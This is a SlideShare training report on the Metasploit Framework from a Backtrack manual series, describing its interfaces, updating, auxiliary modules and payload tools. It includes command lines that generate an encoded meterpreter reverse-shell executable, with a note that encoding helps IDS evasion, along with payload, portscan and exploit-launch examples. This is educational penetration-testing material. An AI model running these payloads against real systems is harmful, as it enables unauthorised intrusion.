SlideShare ist ein Scribd-Unternehmen logo

Backtrack Manual Part6

Als DOCX, PDF herunterladen
Nutan Kumar Panda
Nutan Kumar Panda

enjoy...For any query contact: nutan.appin@gmail.com

BildungTechnologie
1 von 16
Project Report<br />-459105253365on<br />-22459952540<br />Project by - Nutan Kumar Panda<br />Technology Evangelist ISEH<br />R&D - ATL Guwahati<br />Metasploit<br />The MSF is an open-source tool, which provides a framework for security researchers to develop exploits payloads, payload encoders, and tools for reconnaissance and other security testing purposes. Although, it initially started off as a collection of exploits and provided the ability for large chunks of code to be re-used across different exploits, in its current form it provides extensive capabilities for the design and development of reconnaissance, exploitation, and post- exploitation security tools.<br />Exploitation<br />Exploitation involves code that performs a number of key functions, such as:<br />Connecting to the remote system on the vulnerable port.<br />Exchanging initial protocol sequence until the vulnerable fault injection point is reached.<br />Injecting exploit code, which includes instructions for the return address to be modified to point directly or indirectly into our payload, as well as NOP instructions, which increase the chances that our code will eventually be executed.<br />Post-exploitation fun, which could be either connecting to a command prompt.<br />bound to a listening port on the compromised system, or connecting to the remote system with the username and password of a user that has been created as part of the exploit process, or it could mean connecting with a GUI client to a remote GUI (such as VNC).<br />Understanding Metasploit Channels<br />The latest version of Metasploit now provides the user with multiple channels to interface with it. These allow a very high degree of flexibility for different requirements or situations such as:<br />,[object Object]
A single user exploiting multiple targets during one session, either in interactive or in batch mode.
Opening multiple payload sessions at once
Suspending and restoring payload sessions.
Sharing payload sessions with other users.
A group of penetration testers collaborating on testing the same network or different networks.
A penetration tester remotely logging in to the pre-configured Metasploit system, and launching exploits from there.The channels available with Metasploit v3.x are listed below:<br />The Directory Structure of the Framework<br />Updating Metasploit<br />The Framework can be updated using a standard Subversion client. The old msfupdate tool is no longer supported. Windows users can click on the Online Update link within the Metasploit 3 program folder on the Start Menu. To obtain the latest updates on a Unix-like platform, change into the Framework installation directory and execute svn update. If you are accessing the internet through a HTTP proxy server, please see the Subversion FAQ on proxy access:<br />http://subversion.tigris.org/faq.html#proxy<br />One of the primary values of Metasploit is that it is constantly being updated to provide exploits for the newest and most interesting vulnerabilities. As time goes on and patches are applied, a given exploit becomes less and less likely to work, so using the latest exploits is usually a very good idea. By routinely updating Metasploit (e.g before every use), you give yourself the best<br />chance of exploiting your targets successfully. Older versions of Metasploit used a custom utility called msfupdate to grab the latest code, but as of Metasploit 3.0, msfupdate has been replaced by Subversion (http://subversion.tigris.org). Once you’ve downloaded Metasploit, you now keep it up to date simply by using your Subversion client of choice to “update” the Metasploit directory. For example, I update my Metasploit using the Unix command-line Subversion client called svn, which looks something like this:<br />svn update<br />At revision 4532.<br />This isn’t a particularly exciting example because my Metasploit was already up to date, but then again, that’s a good thing. If your Metasploit was in need of updating, you would see a list of file modifications and deletions more like this:<br />svn update<br />UU modules/nops/ppc/simple.rb<br />UU modules/nops/x86/opty2.rb<br />UU modules/nops/x86/single_byte.rb<br />UU modules/nops/nop_test.rb.ut.rb<br />A modules/nops/php<br />A modules/nops/php/generic.rb<br />UU modules/nops/sparc/random.rb<br />…………<br />………..<br />Updated to version 4532<br />Msfopcode<br />The Metasploit project team has done a marvelous job in creating an opcode database that now consists of over 14 million opcodes. Earlier, this database was accessible only over the Web on the Metasploit Web site.With version 3.0 of the framework, this data can now be accessed via the msfopcode interface, which connects back to the Metasploit Web server to retrieve the actual information. The options available with msfopcode are available when executing this utility with the –h switch. This interface is merely a front end to the ex::Exploitation::OpcodeDb::Client class interface that interfaces with a HTTP-based XML protocol running on the Metasploit.com Web server.<br />./msfopcode<br />Usage: msfopcode command<br />SUPPORTED COMMANDS<br />stats Display database statistics<br />locales Display supported locales<br />metatypes Display Supported opcode meta types (Ex: imp reg)<br />groups Display supported opcode groups (Ex:esp=>eip)<br />types Display supported opcode type (Ex: imp esp)<br />platforms Display supported platforms<br />modules Display information about specific modules<br />search Search for opcode given a set of criteria<br />The purpose of the stats command is to show the current database statistics, such as the number of opcodes and modules currently indexed by the database and the last time the database was updated. The output to this command looks something like this:<br />./msfopcode stats<br />Last Updated : Sat Sep 03 01:32:00 CDT 2005<br />Number of Opcodes : 12177419<br />Number of Opcode Types : 320<br />Number of Platforms : 14<br />Number of Architectures : 1<br />Number of Modules : 17683<br />Number of Module Segments: 71457<br />Number of Module Imports : 2065492<br />Number of Module Exports : 927637<br />Msfrpc/ Msfrpcd<br />The msfrpcd daemon uses the xmlrpc plugin to provide a remote interface to the Metasploit Framework. By default, This service listens on port 55553, uses SSL, and is password protected. The msfrpcd daemon uses the xmlrpc plugin to provide a remote interface to the Metasploit Framework. By default, This service listens on port 55553, uses SSL, and is password protected.The RPC interface allows access to a minimal set of framework APIs, covering the core framework, the module set, the job list, and the session table. These APIs can be used to enumerate modules, execute them, and interact with the resulting sessions and jobs.<br />[ USAGE ]<br />To activate the RPC interface, launch msfrpcd, or load msfconsole and load the xmlrpc plugin.<br />./msfrpcd -P s3cr3tp4ss<br />- or -<br />msf> load xmlrpc Pass=password<br />Once the interface is started, any compatible RPC interface be used to interact with the service. The 'msfrpc' client provides a Ruby shell that can be used to talk to the service.<br />./msfrpc -h server_name -P s3cr3tp4ss<br />[*] The 'rpc' object holds the RPC client interface<br />>> rpc.call(quot; core.versionquot; )<br />=> {quot; versionquot; =>quot; 3.3-devquot; }<br />Msfd<br />The msfd utility opens a network interface to the msfconsole. It can be executed by specifying the IP address and the port on which it should listen for incoming connections.This allows a single user or multiple users to connect from a remote system to the framework. For instance, the following command will execute the msfd utility as a daemon listening on IP address 192.168.137.128 and port 55554:<br />msfd -a 192.168.137.128 –d –p 55554<br />Msfelfscan/ Msfpescan/ Msfmachscan<br />Msfelfscan, used to locate interesting addresses within executable and linkable format (ELF) programs, which may prove useful in developing exploits. Msfpescan does the same thing for Windows binaries.<br />Auxiliary Modules<br />Auxiliary modules are essentially used to cover the first stage of a penetration test—fingerprinting and vulnerability scanning. The Auxiliary module system includes the Scanner mixin, which makes it possible to write scanning modules that will target one host or a range of user specified hosts. Auxiliary modules can also import any Exploit module mixin, and leverage the protocol-specific application program interfaces (APIs) for Distributed Computing Environment Remote Procedure Call [DCERPC], HTTP, Server Message Block (SMB) and Sun Remote Procedure Call (RPC) protocols. Any exploitation code that does not use a payload would be part of the auxiliary module system.This currently includes dos/windows/smb/ms06_035_mailslot (exploits the MS06-035 kernel pool memory corruption bug in SRV.SYS) and dos/windows/smb/rras_vls_null_deref (triggers a NULL dereference in svchost.exe on all current versions of Windows that run the Routing and Remote Access Service [RRAS]).<br />List all auxiliary modules<br />Metasploit 3.0 supports the auxiliary modules which can be used to perform arbitrary, one-o_ actions such as port scanning, denial of service, and even fuzzing.<br />Now use the appropriate auxiliary module as per your requirement:<br />msf > use scanner/portscan/tcp<br />msf > show options<br />msf > set rhosts 192.168.1.100 or 192.168.1.1/24<br />msf > set ports 1-1024<br />msf > run<br />TCP portscan Result<br />Msfgui<br />The msfgui interface was introduced in version 3.1 and provides the functionality of msfconsole in addition to many new features. To access a msfconsole shell, select the Console option from the Window menu. To search for a module within the module tree, enter a string or regular expression into the search box and click the button labeled Find. All matching modules will appear the tree below. To execute a module, double-click its name in the tree, or right-click its name and select the Execute option. To view the source code of any module, right-click its name and select the View Code option.<br />This new GUI is multi-platform and it is based on Java, the Netbeans project for it can be found in the external/source/gui/msfguijava/ directory for those who want to contribute and have Ninja Skills with Java and user interface. The GUI can be ran by invoking the msfgui script at the base of the Metasploit directory<br />./msfgui<br />The Metasploit Graphical User Interface<br />Msfcli<br />The msfcli interface allows for exploits to be executed from the UNIX or Windows command line without the need to first launch the msfconsole interface. This is best suited for quickly launching an exploit by directly specifying the required parameters as command-line arguments. It is also particularly useful when a large number of systems need to be tested for the same vulnerability. A simple shell script can be written, which cycles through a range of IP addresses and uses msfcli to run exploits against each of the targeted systems. Using the –h switch gives us the options available with this interface A straightforward example that demonstrates the easiest way to run an exploit using the msfcli interface would be:<br />1. Display information about a selected exploit ./msfcli <exploit_name> S<br />2. Show available payloads ./msfcli <exploit_name> P<br />3. Choose the payload with this exploit, and display the options that need to be set<br />./msfcli <exploit_name> PAYLOAD=<payload_name> O<br />4. List available targets ./msfcli <exploit_name> PAYLOAD=<payload_name> T<br />5. Set the required options in option=value form and execute with the E mode<br />Exploiting Windows Box with Msfcli<br />Msfweb<br />The msfweb interface is based on Ruby on Rails. To access this interface, execute msfweb to start up the server. The msfweb interface uses the WEBrick web server to handle requests. By default, msfweb will listen on the loopback address (127.0.0.1) on port 55555. A log message should be displayed indicating that the service has started. To access the interface, open your browser to the appropriate URL (http://127.0.0.1:55555/ by default).<br />The main msfweb interface consists of a toolbar containing various icons and a background with the metasploit logo. If you want access to a console, click the Console link. This console interface is nearly identical to the standard msfconsole interface. The Exploits, Auxiliary, and Payloads links will walk you through the process of selecting a module, con_guring it, and running it. Once an exploit is run and a session is created, you can access these sessions from the Sessions link. These icons will open up a sub-window within the page. These windows can be moved, minimized, maximized, and closed.<br />The msfweb interface is the only GUI currently available to the MSF. It offers no security whatsoever, but is currently the recommended way to use the framework on Windows. This interface can be launched with a number of options, which are available with the –h switch, as shown in the following example:<br />./msfweb –h<br />Usage: msfweb <options><br />OPTIONS:<br />-a <opt> Bind to this IP address instead of loopback<br />-d Daemonize the web server<br />-h Help banner<br />-p <opt> Bind to this port instead of 55555<br />-v <opt> A number between 0 and 3 that controls log verbosity<br />For instance, the following command would launch the Web interface on IP address<br />192.168.1.10 on the default port 55555 and send it into daemon mode. We can connect to it through any supported browser (Mozilla Firefox, Microsoft Internet Explorer, or Safari).<br />./msfweb -a 192.168.1.10 –d<br />Now on any browser type url<br />http://192.168.1.10:5555<br />Msfencode<br />The msfencode utility provides direct access to the payload encoders provided with the framework. These can be listed out using the –l option. Other options that can be used are available using the –h switch.<br />A simple usage for this would be to use the msfpayload utility to generate the payload in raw format, and either pipe the output directly to msfencode or to read it from a file. Encoding ensures that bad characters do not occur in the payload, which also ends up improving the IDS evasion probability. Let’s say we want to encode the payload, but limit ourselves to an alpha-numeric output. We would also like to avoid the NULL (0x00) byte from occurring in the output. This can be done with the msfencode command As can be seen, the size of the output has increased due to the encoding—it was 116 bytes after running the msfpayload command where we redirected the output in raw format to the file in_exec_raw. But when this file is given as input to the encoder, it is now 296 bytes.<br />./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444<br />R | ./msfencode -c 5 -t exe > /tmp/meterpreter_reverse_tcp.exe<br />Generating encoded executable meterpreter reverse Payload<br />Msfpayload<br />The msfpayload utility enables the user to modify existing payloads depending on supplied parameters on the command line, and obtain the output in C, Perl, Ruby or Raw.The following example illustrates the use of msfpayload. The msfpayload –h command lists out the options that can be used along with all the available payloads. We now need to select a payload. The S option shows us information about a specific Payload.<br />After selecting a particular payload to play around with, we can then have msfpayload modify values within the payload, and produce an output with the C option for including the payload as part of a C program, or with the P option for using it in Perl scripts. It could also be output with the Raw format, which allows it to be piped to another program, such as msfencode, or could be redirected to a file. As can be seen from the output shown above, we need to set the CMD parameter in order for a payload to be created, which would execute that particular command upon successful exploitation.We will set it to a very straightforward dir command, and obtain the output for including it in a Ruby script, as shown below:<br />./msfpayload windows/exec CMD=calc.exe P<br />Msfconsole<br />The msfconsole is the traditional and primary means of using the MSF. After installation, the console can be simply launched by typing the command ./msfconsole (for UNIX) and msfconsole (for Windows) from within the path where it has been installed.The prompt that appears as shown in Figure 1.5, displays the graphical Metasploit logo, the version of the framework, the number of exploits, payloads, encoders, NOPs and auxiliary modules available. Immediately after launching the exploit, the intuitive command to type is help and the output from this is shown below.<br />Launching the MSF console<br />Output of the help or ? Command<br />
Backtrack Manual Part6
Backtrack Manual Part6
Backtrack Manual Part6
Backtrack Manual Part6
Backtrack Manual Part6
Backtrack Manual Part6
Backtrack Manual Part6
Backtrack Manual Part6
Backtrack Manual Part6

Empfohlen

Backtrack Manual Part7
Backtrack Manual Part7Backtrack Manual Part7
Backtrack Manual Part7Nutan Kumar Panda
 
ARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENTARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENTDevil's Cafe
 
Wissbi osdc pdf
Wissbi osdc pdfWissbi osdc pdf
Wissbi osdc pdfChris Huang
 
Odoo command line interface
Odoo command line interfaceOdoo command line interface
Odoo command line interfaceJalal Zahid
 
Linux internet server security and configuration tutorial
Linux internet server security and configuration tutorialLinux internet server security and configuration tutorial
Linux internet server security and configuration tutorialannik147
 
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wpBlack hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wprgster
 
Erp 2.50 openbravo environment installation openbravo-wiki
Erp 2.50 openbravo environment installation openbravo-wikiErp 2.50 openbravo environment installation openbravo-wiki
Erp 2.50 openbravo environment installation openbravo-wikiyaranusa
 
Metasploit - The Exploit Learning Tree
Metasploit - The Exploit Learning TreeMetasploit - The Exploit Learning Tree
Metasploit - The Exploit Learning TreeE Hacking
 

Empfohlen

Backtrack Manual Part7
Backtrack Manual Part7Backtrack Manual Part7
Backtrack Manual Part7Nutan Kumar Panda
 
ARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENTARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENTDevil's Cafe
 
Wissbi osdc pdf
Wissbi osdc pdfWissbi osdc pdf
Wissbi osdc pdfChris Huang
 
Odoo command line interface
Odoo command line interfaceOdoo command line interface
Odoo command line interfaceJalal Zahid
 
Linux internet server security and configuration tutorial
Linux internet server security and configuration tutorialLinux internet server security and configuration tutorial
Linux internet server security and configuration tutorialannik147
 
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wpBlack hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wprgster
 
Erp 2.50 openbravo environment installation openbravo-wiki
Erp 2.50 openbravo environment installation openbravo-wikiErp 2.50 openbravo environment installation openbravo-wiki
Erp 2.50 openbravo environment installation openbravo-wikiyaranusa
 
Metasploit - The Exploit Learning Tree
Metasploit - The Exploit Learning TreeMetasploit - The Exploit Learning Tree
Metasploit - The Exploit Learning TreeE Hacking
 
Quick start with pallaral meta on window10 virtual desktop-virtualbox linux u...
Quick start with pallaral meta on window10 virtual desktop-virtualbox linux u...Quick start with pallaral meta on window10 virtual desktop-virtualbox linux u...
Quick start with pallaral meta on window10 virtual desktop-virtualbox linux u...Thomas K. Y. Lam
 
Linuxbasiccommands
LinuxbasiccommandsLinuxbasiccommands
LinuxbasiccommandsManikanta Pushadapu
 
Linux System Monitoring
Linux System Monitoring Linux System Monitoring
Linux System Monitoring PriyaTeli
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemBikrant Gautam
 
Linux Networking Commands
Linux Networking CommandsLinux Networking Commands
Linux Networking Commandstmavroidis
 
introduction to linux kernel tcp/ip ptocotol stack
introduction to linux kernel tcp/ip ptocotol stack introduction to linux kernel tcp/ip ptocotol stack
introduction to linux kernel tcp/ip ptocotol stack monad bobo
 
Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)Bernardo Damele A. G.
 
Linux
LinuxLinux
LinuxRathan Raj
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Systemtap
SystemtapSystemtap
SystemtapFeng Yu
 
Oracle database might have problems with stale NFSv3 locks upon restart
Oracle database might have problems with stale NFSv3 locks upon restartOracle database might have problems with stale NFSv3 locks upon restart
Oracle database might have problems with stale NFSv3 locks upon restartAshwin Pawar
 
Cracking CTFs The Sysbypass CTF
Cracking CTFs The Sysbypass CTFCracking CTFs The Sysbypass CTF
Cracking CTFs The Sysbypass CTFRiyaz Walikar
 
PhyloPipe.v1.1_manual_20150610
PhyloPipe.v1.1_manual_20150610PhyloPipe.v1.1_manual_20150610
PhyloPipe.v1.1_manual_20150610Yixuan Guo
 
Yum (Linux)
Yum (Linux) Yum (Linux)
Yum (Linux) Raghu nath
 
Docker 2014
Docker 2014Docker 2014
Docker 2014Open Networking Perú (Opennetsoft)
 
Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)Bernardo Damele A. G.
 
Intermediate Capistrano
Intermediate CapistranoIntermediate Capistrano
Intermediate CapistranoLee Hambley
 
Curl
CurlCurl
Curlmanasystest
 
12 yum
12 yum12 yum
12 yumjosemanuelacostarendon
 
Meeting 9 samba
Meeting 9 sambaMeeting 9 samba
Meeting 9 sambaSyaiful Ahdan
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
W3af
W3afW3af
W3afvjbala
 

Weitere ähnliche Inhalte

Was ist angesagt?

Quick start with pallaral meta on window10 virtual desktop-virtualbox linux u...
Quick start with pallaral meta on window10 virtual desktop-virtualbox linux u...Quick start with pallaral meta on window10 virtual desktop-virtualbox linux u...
Quick start with pallaral meta on window10 virtual desktop-virtualbox linux u...Thomas K. Y. Lam
 
Linux System Monitoring
Linux System Monitoring Linux System Monitoring
Linux System Monitoring PriyaTeli
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemBikrant Gautam
 
Linux Networking Commands
Linux Networking CommandsLinux Networking Commands
Linux Networking Commandstmavroidis
 
introduction to linux kernel tcp/ip ptocotol stack
introduction to linux kernel tcp/ip ptocotol stack introduction to linux kernel tcp/ip ptocotol stack
introduction to linux kernel tcp/ip ptocotol stack monad bobo
 
Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)Bernardo Damele A. G.
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Systemtap
SystemtapSystemtap
SystemtapFeng Yu
 
Oracle database might have problems with stale NFSv3 locks upon restart
Oracle database might have problems with stale NFSv3 locks upon restartOracle database might have problems with stale NFSv3 locks upon restart
Oracle database might have problems with stale NFSv3 locks upon restartAshwin Pawar
 
Cracking CTFs The Sysbypass CTF
Cracking CTFs The Sysbypass CTFCracking CTFs The Sysbypass CTF
Cracking CTFs The Sysbypass CTFRiyaz Walikar
 
PhyloPipe.v1.1_manual_20150610
PhyloPipe.v1.1_manual_20150610PhyloPipe.v1.1_manual_20150610
PhyloPipe.v1.1_manual_20150610Yixuan Guo
 
Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)Bernardo Damele A. G.
 
Intermediate Capistrano
Intermediate CapistranoIntermediate Capistrano
Intermediate CapistranoLee Hambley
 

Was ist angesagt? (20)

Quick start with pallaral meta on window10 virtual desktop-virtualbox linux u...
Quick start with pallaral meta on window10 virtual desktop-virtualbox linux u...Quick start with pallaral meta on window10 virtual desktop-virtualbox linux u...
Quick start with pallaral meta on window10 virtual desktop-virtualbox linux u...
 
Linuxbasiccommands
LinuxbasiccommandsLinuxbasiccommands
Linuxbasiccommands
 
Linux System Monitoring
Linux System Monitoring Linux System Monitoring
Linux System Monitoring
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
 
Linux Networking Commands
Linux Networking CommandsLinux Networking Commands
Linux Networking Commands
 
introduction to linux kernel tcp/ip ptocotol stack
introduction to linux kernel tcp/ip ptocotol stack introduction to linux kernel tcp/ip ptocotol stack
introduction to linux kernel tcp/ip ptocotol stack
 
Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)
 
Linux
LinuxLinux
Linux
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
 
Systemtap
SystemtapSystemtap
Systemtap
 
Oracle database might have problems with stale NFSv3 locks upon restart
Oracle database might have problems with stale NFSv3 locks upon restartOracle database might have problems with stale NFSv3 locks upon restart
Oracle database might have problems with stale NFSv3 locks upon restart
 
Cracking CTFs The Sysbypass CTF
Cracking CTFs The Sysbypass CTFCracking CTFs The Sysbypass CTF
Cracking CTFs The Sysbypass CTF
 
PhyloPipe.v1.1_manual_20150610
PhyloPipe.v1.1_manual_20150610PhyloPipe.v1.1_manual_20150610
PhyloPipe.v1.1_manual_20150610
 
Yum (Linux)
Yum (Linux) Yum (Linux)
Yum (Linux)
 
Docker 2014
Docker 2014Docker 2014
Docker 2014
 
Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)
 
Intermediate Capistrano
Intermediate CapistranoIntermediate Capistrano
Intermediate Capistrano
 
Curl
CurlCurl
Curl
 
12 yum
12 yum12 yum
12 yum
 
Meeting 9 samba
Meeting 9 sambaMeeting 9 samba
Meeting 9 samba
 

Ähnlich wie Backtrack Manual Part6

Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android DemoArpit Agarwal
 
Citrix command lines
Citrix command linesCitrix command lines
Citrix command linesprincesly
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesTrowalts
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploitwozgeass
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesEran Goldstein
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworksphanleson
 
Install websphere message broker 8 RHEL 6 64 bits
Install websphere message broker 8 RHEL 6 64 bitsInstall websphere message broker 8 RHEL 6 64 bits
Install websphere message broker 8 RHEL 6 64 bitsManuel Vega
 
Taming Deployment With Smart Frog
Taming Deployment With Smart FrogTaming Deployment With Smart Frog
Taming Deployment With Smart FrogSteve Loughran
 
4 implementation
4 implementation4 implementation
4 implementationhanmya
 
Piattaforma Web Linux completa dai sorgenti
Piattaforma Web Linux completa dai sorgentiPiattaforma Web Linux completa dai sorgenti
Piattaforma Web Linux completa dai sorgentiGiulio Destri
 
Docker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platformsDocker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platformsFederico Michele Facca
 
Developing Realtime Data Pipelines With Apache Kafka
Developing Realtime Data Pipelines With Apache KafkaDeveloping Realtime Data Pipelines With Apache Kafka
Developing Realtime Data Pipelines With Apache KafkaJoe Stein
 

Ähnlich wie Backtrack Manual Part6 (20)

Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
W3af
W3afW3af
W3af
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android Demo
 
Citrix command lines
Citrix command linesCitrix command lines
Citrix command lines
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniques
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
 
Metasploit
MetasploitMetasploit
Metasploit
 
Install websphere message broker 8 RHEL 6 64 bits
Install websphere message broker 8 RHEL 6 64 bitsInstall websphere message broker 8 RHEL 6 64 bits
Install websphere message broker 8 RHEL 6 64 bits
 
Cheatsheet: Metasploit
Cheatsheet: MetasploitCheatsheet: Metasploit
Cheatsheet: Metasploit
 
Taming Deployment With Smart Frog
Taming Deployment With Smart FrogTaming Deployment With Smart Frog
Taming Deployment With Smart Frog
 
4 implementation
4 implementation4 implementation
4 implementation
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
 
Piattaforma Web Linux completa dai sorgenti
Piattaforma Web Linux completa dai sorgentiPiattaforma Web Linux completa dai sorgenti
Piattaforma Web Linux completa dai sorgenti
 
Docker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platformsDocker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platforms
 
Internship msc cs
Internship msc csInternship msc cs
Internship msc cs
 
mqttvsrest_v4.pdf
mqttvsrest_v4.pdfmqttvsrest_v4.pdf
mqttvsrest_v4.pdf
 
Developing Realtime Data Pipelines With Apache Kafka
Developing Realtime Data Pipelines With Apache KafkaDeveloping Realtime Data Pipelines With Apache Kafka
Developing Realtime Data Pipelines With Apache Kafka
 
IPS_3M_eng
IPS_3M_engIPS_3M_eng
IPS_3M_eng
 

Mehr von Nutan Kumar Panda

Dark Arts Of Social Engineering
Dark Arts Of Social EngineeringDark Arts Of Social Engineering
Dark Arts Of Social EngineeringNutan Kumar Panda
 
OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!Nutan Kumar Panda
 
Rapid Android Application Security Testing
Rapid Android Application Security TestingRapid Android Application Security Testing
Rapid Android Application Security TestingNutan Kumar Panda
 

Mehr von Nutan Kumar Panda (13)

Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
 
Dark Arts Of Social Engineering
Dark Arts Of Social EngineeringDark Arts Of Social Engineering
Dark Arts Of Social Engineering
 
OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!
 
Rapid Android Application Security Testing
Rapid Android Application Security TestingRapid Android Application Security Testing
Rapid Android Application Security Testing
 
Win 8 password cracking
Win 8 password crackingWin 8 password cracking
Win 8 password cracking
 
Backtrack Manual Part10
Backtrack Manual Part10Backtrack Manual Part10
Backtrack Manual Part10
 
Backtrack Manual Part9
Backtrack Manual Part9Backtrack Manual Part9
Backtrack Manual Part9
 
Backtrack Manual Part5
Backtrack Manual Part5Backtrack Manual Part5
Backtrack Manual Part5
 
Backtrack Manual Part4
Backtrack Manual Part4Backtrack Manual Part4
Backtrack Manual Part4
 
Backtrack Manual Part3
Backtrack Manual Part3Backtrack Manual Part3
Backtrack Manual Part3
 
Backtrack Manual Part2
Backtrack Manual Part2Backtrack Manual Part2
Backtrack Manual Part2
 
Backtrack manual Part1
Backtrack manual Part1Backtrack manual Part1
Backtrack manual Part1
 
Google Hack
Google HackGoogle Hack
Google Hack
 

Kürzlich hochgeladen

1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdfQucHHunhnh
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphThiyagu K
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsTechSoup
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingTechSoup
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhikauryashika82
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactPECB
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxVishalSingh1417
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfciinovamais
 
ICT Role in 21st Century Education & its Challenges.pptx
